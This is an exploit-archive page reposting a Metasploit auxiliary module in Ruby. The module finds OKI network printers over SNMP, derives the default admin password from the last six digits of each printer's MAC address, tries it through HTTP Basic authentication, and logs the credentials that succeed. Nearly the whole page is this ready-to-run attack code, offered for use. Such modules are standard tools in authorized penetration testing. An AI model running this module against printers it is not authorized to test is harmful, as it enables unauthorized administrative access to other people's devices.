OKI Printer Default Login Credential Scanner

2024.09.08
Credit: antr6X
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # TODO: Split this module into two separate SNMP and HTTP modules. class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'OKI Printer Default Login Credential Scanner', 'Description' => %q{ This module scans for OKI printers via SNMP, then tries to connect to found devices with vendor default administrator credentials via HTTP authentication. By default, OKI network printers use the last six digits of the MAC as admin password. }, 'Author' => 'antr6X <anthr6x[at]gmail.com>', 'License' => MSF_LICENSE )) register_options( [ OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]), OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80]) ]) deregister_options('RPORT', 'VHOST') end def cleanup datastore['RPORT'] = @org_rport end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: Time.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def run_host(ip) @org_rport = datastore['RPORT'] datastore['RPORT'] = datastore['SNMPPORT'] index_page = "index_ad.htm" auth_req_page = "status_toc_ad.htm" snmp = connect_snmp() snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac| last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase # check if it is a OKI # OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt if first_six == "002536" || first_six == "008087" || first_six == "002536" sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s print_status("Found: #{sys_name}") print_status("Trying credential: admin/#{last_six}") tcp = Rex::Socket::Tcp.create( 'PeerHost' => rhost, 'PeerPort' => datastore['HTTPPORT'], 'Context' => { 'Msf'=>framework, 'MsfExploit'=>self } ) auth = Rex::Text.encode_base64("admin:#{last_six}") http_data = "GET /#{auth_req_page} HTTP/1.1\r\n" http_data << "Referer: http://#{ip}/#{index_page}\r\n" http_data << "Authorization: Basic #{auth}\r\n\r\n" tcp.put(http_data) data = tcp.recv(12) response = "#{data[9..11]}" case response when "200" print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}") report_cred( ip: rhost, port: datastore['HTTPPORT'], service_name: 'http', user: 'admin', password: last_six, proof: response.inspect ) when "401" print_error("Default credentials failed") when "404" print_status("Page not found, try credential manually: admin/#{last_six}") else print_status("Unexpected message") end disconnect() end end # No need to make noise about timeouts rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion rescue ::Interrupt raise $! rescue ::Exception => e print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}") ensure disconnect_snmp end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top